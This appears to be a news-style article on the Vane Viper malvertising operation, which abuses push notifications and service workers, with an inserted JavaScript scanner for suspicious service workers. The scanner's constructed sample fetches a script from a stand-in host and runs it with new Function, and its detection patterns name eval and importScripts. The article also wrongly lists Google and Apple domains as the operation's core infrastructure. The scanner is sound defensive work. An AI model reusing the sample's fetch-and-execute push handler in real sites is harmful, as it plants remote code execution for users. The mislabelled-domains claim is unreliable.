
Adversaries Misuse Advertising Technologies to Deliver Harmful Advertisements towards Users.

Vane Viper distributes malware on a mass scale, with hundreds of thousands of compromised websites and approximately one trillion DNS queries worldwide.

Malicious Advertisements Delivered to Users via Abused Adtech Platforms by Malicious Entities


In the ever-evolving world of digital marketing, a new threat has emerged, known as Vane Viper. This operation, connected to AdTech Holding, a Cyprus-based company, has been making waves in the digital advertising ecosystem.

Vane Viper employs malicious service workers to manipulate browser behaviour and maintain long-term access to compromised systems. The operation is particularly resilient: its core infrastructure domains, including those of Google, Apple, and various push notification services, have remained operational for over 1,200 days despite takedown attempts.

The infrastructure of Vane Viper spans approximately 60,000 domains, a fraction of the broader malicious ecosystem it controls. The operation abuses browser push notifications to achieve persistent access to victim devices; users who accept these notifications become part of a persistent malvertising network.

Analysis reveals that most operational domains remain active for less than a month, with registration counts reaching 3,500 domains in peak months. Vane Viper demonstrates remarkable resilience through its domain management strategy, cycling through thousands of newly registered domains each month.

Service workers employed by Vane Viper use script chaining techniques to abuse push notifications, and the most concerning element is their use of the fetch() function to retrieve and execute arbitrary content from remote URLs. Those remote URLs are determined by domains hardcoded within the service worker, creating a dynamic command and control mechanism.
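As an added defender-side illustration (not code from the article or from Infoblox's research), the following heuristic checks a service worker script for the combination described above: a push handler, a hardcoded remote host outside an allowlist, and execution of fetched content. The sample scripts and hostnames are constructed.

```javascript
// Heuristic scanner for service-worker scripts (added example, not from the article).
const RISK_PATTERNS = {
  pushHandler: /addEventListener\s*\(\s*['"](push|notificationclick)['"]/,
  remoteFetch: /\bfetch\s*\(/,
  // eval(), new Function() and importScripts() all turn fetched text into running code.
  dynamicExec: /\b(eval|Function|importScripts)\s*\(/,
};

// Pull every http(s) hostname that appears inside a string literal in the script.
function extractHardcodedHosts(source) {
  const hosts = new Set();
  const re = /['"`]https?:\/\/([^/'"`\s]+)/g;
  let m;
  while ((m = re.exec(source)) !== null) hosts.add(m[1].toLowerCase());
  return [...hosts].sort();
}

// allowedHosts: origins the site legitimately contacts (e.g. its own CDN or push provider).
function assessServiceWorker(source, allowedHosts = []) {
  const allowed = new Set(allowedHosts.map((h) => h.toLowerCase()));
  const unexpectedHosts = extractHardcodedHosts(source).filter((h) => !allowed.has(h));
  const findings = [];
  if (RISK_PATTERNS.pushHandler.test(source)) findings.push('push-handler');
  if (RISK_PATTERNS.remoteFetch.test(source)) findings.push('remote-fetch');
  if (RISK_PATTERNS.dynamicExec.test(source)) findings.push('dynamic-exec');
  if (unexpectedHosts.length) findings.push('unexpected-host');
  // All four together is the push -> fetch -> execute chain the article describes.
  const verdict = findings.length >= 4 ? 'high' : findings.length >= 2 ? 'medium' : 'low';
  return { verdict, findings, unexpectedHosts };
}

// Constructed samples (hostnames use the reserved .invalid TLD).
const BENIGN_SW = `
self.addEventListener('install', () => self.skipWaiting());
self.addEventListener('fetch', (e) =>
  e.respondWith(caches.match(e.request).then((r) => r || fetch(e.request))));
`;
const SUSPECT_SW = `
const REMOTE = 'https://cdn-update.example.invalid';
self.addEventListener('push', (e) => {
  e.waitUntil(fetch(REMOTE + '/p.js').then((r) => r.text()).then((s) => new Function(s)()));
});
`;
```

Run the assessment against each script served from `/sw.js` on a site you administer and review anything rated medium or high by hand; the allowlist keeps a legitimate push provider from counting as an unexpected host.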

Vane Viper's reach extends beyond traditional malware distribution, encompassing fake shopping sites, fraudulent browser extensions, survey scams, and adult content. The digital advertising ecosystem is a prime target for cybercriminals, and Vane Viper is a stark reminder of this reality.

Infoblox researchers have identified compelling evidence suggesting that PropellerAds, a subsidiary of AdTech Holding, may be involved in ad-fraud campaigns. The actors behind the Vane Viper operation are connected to PropellerAds and its parent company AdTech Holding. Researchers have exposed that PropellerAds is not merely abused but actively participates in and facilitates malware distribution and ad fraud through its adtech network.

PropellerAds operates as both an advertising network and traffic broker, making it a strategic player in the digital advertising ecosystem. However, its involvement in such malicious activities raises serious concerns about the transparency and security of the digital advertising industry.

As the battle against cyber threats continues, it is crucial to stay vigilant and informed about the tactics and strategies used by malicious actors like Vane Viper. By understanding these threats, we can take proactive measures to protect ourselves and our digital assets.
